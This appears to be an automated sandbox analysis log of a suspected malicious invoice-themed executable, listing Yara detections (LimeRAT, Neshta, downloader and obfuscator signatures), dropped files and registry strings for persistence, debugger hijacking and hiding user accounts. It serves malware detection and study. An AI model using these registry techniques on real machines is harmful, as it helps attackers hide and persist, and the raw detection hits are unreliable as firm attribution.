Source: Yara match	File source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000023.00000003.6336769092.0000028BD7D54000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6278239354.0000028BD7D54000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6327648470.0000028BD7D54000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6264910076.0000028BD7D54000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6348949380.0000028BD7D54000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6292138132.0000028BD80C5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected AllatoriJARObfuscator

Show sources

Source: Yara match	File source: 35.3.MpSigStub.exe.28bd62c32d4.74.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd62c283a.76.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd62c32d4.170.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd62c283a.171.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd62a62ea.169.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd62c2d87.75.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd62a62ea.73.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd62c32d4.74.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd62c32d4.170.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd62c2d87.172.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd62c283a.76.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd62c2d87.172.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd62c283a.171.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd62c2d87.75.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000023.00000003.6286543485.0000028BD62AA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6292767693.0000028BD7F7B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6329904387.0000028BD62AA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected MSILLoadEncryptedAssembly

Show sources

Source: Yara match	File source: 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Binary or sample is protected by dotNetProtector

Show sources

Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: HSTR:MSIL/PvLogiciels.dotNetProtector.A
Source: MpSigStub.exe, 00000023.00000003.6338781268.0000028BD70B3000.00000004.00000001.sdmp	String found in binary or memory: PvLogiciels.dotNetProtector
Source: MpSigStub.exe, 00000023.00000003.6338781268.0000028BD70B3000.00000004.00000001.sdmp	String found in binary or memory: <dotNetProtector>
Source: MpSigStub.exe, 00000023.00000003.6282378484.0000028BD702F000.00000004.00000001.sdmp	String found in binary or memory: !#HSTR:MSIL/PvLogiciels.dotNetProtector.A
Source: MpSigStub.exe, 00000023.00000003.6282378484.0000028BD702F000.00000004.00000001.sdmp	String found in binary or memory: PvLogiciels.dotNetProtector.Runtime
Source: MpSigStub.exe, 00000023.00000003.6282378484.0000028BD702F000.00000004.00000001.sdmp	String found in binary or memory: <dotNetProtector>x
Source: MpSigStub.exe, 00000023.00000003.6300288491.0000028BD79FB000.00000004.00000001.sdmp	String found in binary or memory: :#Lowfi:HSTR:MSIL/PvLogiciels.dotNetProtector.A
Source: MpSigStub.exe, 00000023.00000003.6300288491.0000028BD79FB000.00000004.00000001.sdmp	String found in binary or memory: :#Lowfi:HSTR:MSIL/PvLogiciels.dotNetProtector.AU5n
Source: MpSigStub.exe, 00000023.00000003.6300288491.0000028BD79FB000.00000004.00000001.sdmp	String found in binary or memory: Y#PERSIST:HSTR:MSIL/PvLogiciels.dotNetProtector.A
Source: MpSigStub.exe, 00000023.00000003.6300288491.0000028BD79FB000.00000004.00000001.sdmp	String found in binary or memory: Y#PERSIST:HSTR:MSIL/PvLogiciels.dotNetProtector.AU6

Yara detected VB6 Downloader Generic

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected BatToExe compiled binary

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Source: mpavbase.vdm.35.dr	Static PE information: real checksum: 0x354a210 should be:
Source: mpasbase.vdm.35.dr	Static PE information: real checksum: 0x329e303 should be:

Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe	Code function: 0_2_0040545F push eax; iretd
Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe	Code function: 0_2_00405426 push eax; iretd
Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe	Code function: 0_2_00402F51 push 758B20A2h; ret
Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe	Code function: 0_2_00406154 push eax; ret
Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe	Code function: 0_2_00403B21 push ds; ret
Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe	Code function: 0_2_004049E5 push eax; iretd
Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe	Code function: 0_2_004043FF push eax; iretd
Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe	Code function: 0_2_00403585 push eax; iretd
Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe	Code function: 0_2_0227425F push edi; ret
Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe	Code function: 0_2_022748B2 push ss; retf
Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe	Code function: 0_2_0227393F pushad ; ret
Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe	Code function: 0_2_02272170 push esp; iretd
Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe	Code function: 0_2_02272B9C push ebx; iretd
Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe	Code function: 0_2_02271BF1 push eax; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1E00C623 push eax; iretd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1E00C663 push eax; iretd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1E00C673 push eax; iretd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1E00C683 push eax; iretd

Persistence and Installation Behavior:

Yara detected Neshta

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe	File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\mpasdlta.vdm	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe	File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\mpavdlta.vdm	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe	File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\mpasbase.vdm	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe	File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\mpavbase.vdm	Jump to dropped file

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe	File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe	File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\mpavdlta.vdm	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe	File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\mpavbase.vdm	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe	File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\mpasdlta.vdm	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe	File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\mpasbase.vdm	Jump to dropped file

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe	File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe	File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\mpavdlta.vdm	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe	File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\mpavbase.vdm	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe	File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\mpasdlta.vdm	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe	File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\mpasbase.vdm	Jump to dropped file

Boot Survival:

Yara detected LimeRAT

Show sources

Source: Yara match	File source: 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Neshta

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Hooking and other Techniques for Hiding and Protection:

May modify the system service descriptor table (often done to hook functions)

Show sources

Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp

Binary or memory string: KeServiceDescriptorTable

Contains functionality to hide user accounts

Show sources

Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
Source: MpSigStub.exe, 00000023.00000003.6304347628.0000028BD6F26000.00000004.00000001.sdmp	String found in binary or memory: DOWS\CURRENTVERSION\INTERNET SETTINGS\\CertificateRevocationXHKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\\CertificateRevocationSHKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\USER AGENT\\SHKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\USER AGENT\\DHKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\PREAPPROVED\\\DHKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\PREAPPROVED\\\LHKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\WindowsUpdate\Auto Update\\>HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\\WHKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\SpecialAccounts\UserList\\>HKCU\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\\JHKLM\SOFTWARE\Wow6432Node\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\\JHKCU\SOFTWARE\Wow6432Node\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\\@HKCU\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\\LOADLHKCU\SOFTWARE\Wow6432Node\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\\LOAD?HKCU\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\\RUNKHKCU\SOFTWARE\Wow6432Node\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\\RUN^HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\(1)\\DEBUGGERIHKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\PACKAGEDAPPXDEBUG\(1)\\IHKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\PACKAGEDAPPXDEBUG\(1)\\WHKCU\SOFTWARE\CLASSES\ACTIVATABLECLASSES\PACKAGE\(1)\DEBUGINFORMATION\(1)\\DEBUGPATHWHKLM\SOFTWARE\CLASSES\ACTIVATABLECLASSES\PACKAGE\(1)\DEBUGINFORMATION\(1)\\DEBUGPATHKHKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SYSTEMRESTORE\\DISABLESR+HKLM\SOFTWARE\MICROSOFT\SECURITY CENTER\\/HKLM\SOFTWARE\MICROSOFT\SECURITY CENTER\SVC\\>HKLM\Software\Microsoft\Windows Defender Security Center\\\-HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\\-HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\\2HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\EUPP\\2HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\EUPP\\6HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\EUPP\DSP\\6HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\EUPP\DSP\\GHKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\DOWNLOAD\\CHECKEXESIGNATURESEHKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\DESKTOP\GENERAL\\WALLPAPERDHKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\PHISHINGFILTER\\ENABLEDV8AHKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\APPROVED EXTENSIONS\\AHKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\APPROVED EXTENSIONS\\HHKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\\HHKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\\*

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
